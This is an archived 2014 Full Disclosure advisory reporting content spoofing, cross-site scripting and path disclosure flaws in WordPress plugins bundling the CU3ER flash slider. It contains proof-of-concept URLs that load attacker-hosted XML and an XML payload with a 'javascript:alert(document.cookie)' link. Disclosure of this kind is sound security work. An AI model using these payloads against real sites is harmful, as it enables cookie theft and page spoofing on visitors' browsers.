[<prev] [next>] [day] [month] [year] [list]
Message-ID: <008201cf5d8b$3d3c8f10$9b7a6fd5@pc>
Date: Mon, 21 Apr 2014 20:57:50 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>,
<fulldisclosure@...lists.org>
Subject: [FD] CS,
XSS and FPD vulnerabilities in multiple plugins with CU3ER for
WordPress
Hello list!
Recently I disclosed vulnerabilities in CU3ER
(http://seclists.org/fulldisclosure/2014/Apr/244) and vulnerabilities in
plugins with CU3ER for WordPress, Joomla, SilverStripe and Plone
(http://seclists.org/fulldisclosure/2014/Apr/251). This is popular flash
file and in Google's index there are up to million web sites with it
(inurl:cu3er.swf filetype:swf - now Google shows 994000 results).
These are Content Spoofing, Cross-Site Scripting and Full path disclosure
vulnerabilities in plugins with CU3ER for WordPress. In previous report I
wrote about wpCU3ER. Also CU3ER is used in the next plugins for WordPress:
NextGen Cu3er Gallery, Simple Cu3er, Cu3er Post Elements, Gallery Manager,
Cu3er Slider and other plugins, including custom plugins.
-------------------------
Affected products:
-------------------------
Vulnerable are all plugins with flash file of CU3ER.
Vulnerable are NextGen Cu3er Gallery 0.1 and previous versions.
Vulnerable are Simple Cu3er 1.0.1 and previous versions.
Vulnerable are Cu3er Post Elements 0.5.1 and previous versions.
Vulnerable are all versions of Gallery Manager.
Vulnerable are all versions of Cu3er Slider.
-------------------------
Affected vendors:
-------------------------
SchattenMann
https://github.com/wp-plugins/nextgen-cu3er-gallery/
momo360modena
https://github.com/wp-plugins/simple-cu3er
Daniel Sachs
http://18elements.com/tools/cu3er-post-elements
----------
Details:
----------
Content Spoofing (Content Injection) (WASC-12):
NextGen Cu3er Gallery:
http://site/wp-content/plugins/nextgen-cu3er-gallery/swf/cu3er.swf?xml=http://site2/1.xml
Simple Cu3er:
http://site/wp-content/plugins/simple-cu3er/swf/cu3er.swf?xml=http://site2/1.xml
Cu3er Post Elements:
http://site/wp-content/plugins/cu3er-post-elements/cu3er.swf?xml=http://site2/1.xml
Gallery Manager:
http://site/wp-content/plugins/gallery-manager/swf/cu3er.swf?xml=http://site2/1.xml
Cu3er Slider:
http://site/wp-content/plugins/cu3er-slider/cu3er.swf?xml=http://site2/1.xml
Cross-Site Scripting (WASC-08):
NextGen Cu3er Gallery:
http://site/wp-content/plugins/nextgen-cu3er-gallery/swf/cu3er.swf?xml=http://site2/xss.xml
Simple Cu3er:
http://site/wp-content/plugins/simple-cu3er/swf/cu3er.swf?xml=http://site2/xss.xml
Cu3er Post Elements:
http://site/wp-content/plugins/cu3er-post-elements/cu3er.swf?xml=http://site2/xss.xml
Gallery Manager:
http://site/wp-content/plugins/gallery-manager/swf/cu3er.swf?xml=http://site2/xss.xml
Cu3er Slider:
http://site/wp-content/plugins/cu3er-slider/cu3er.swf?xml=http://site2/xss.xml
1.xml:
<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
<slides>
<slide>
<url>1.jpg</url>
<link>http://websecurity.com.ua</link>
</slide>
</slides>
</cu3er>
xss.xml:
<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
<slides>
<slide>
<url>1.jpg</url>
<link>javascript:alert(document.cookie)</link>
</slide>
</slides>
</cu3er>
For cross-domain attacks it's needed to have crossdomain.xml at web site
with xml-files.
Full path disclosure (WASC-13):
FPD in php-files of the plugin (by default) or in error_log.
http://site/wp-content/plugins/nextgen-cu3er-gallery/cu3er.php
http://site/wp-content/plugins/nextgen-cu3er-gallery/xml/cu3er.php
http://site/wp-content/plugins/simple-cu3er/simple-cu3er.php
http://site/wp-content/plugins/cu3er-post-elements/cu3er-post-elements.php
http://site/wp-content/plugins/gallery-manager/gallery-manager.php and in
multiple php-files in subfolders of the plugin
http://site/wp-content/plugins/cu3er-slider/cu3er-slider.php
------------
Timeline:
------------
2013.11.22 - announced at my site about CU3ER.
2013.11.26 - informed developer.
2013.11.26 - announced at my site about plugins. Later informed developers
of the plugins.
2014.04.18 - disclosed at my site about plugins for different CMS.
2014.04.19 - disclosed at my site about plugins for WP
(http://websecurity.com.ua/7122/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists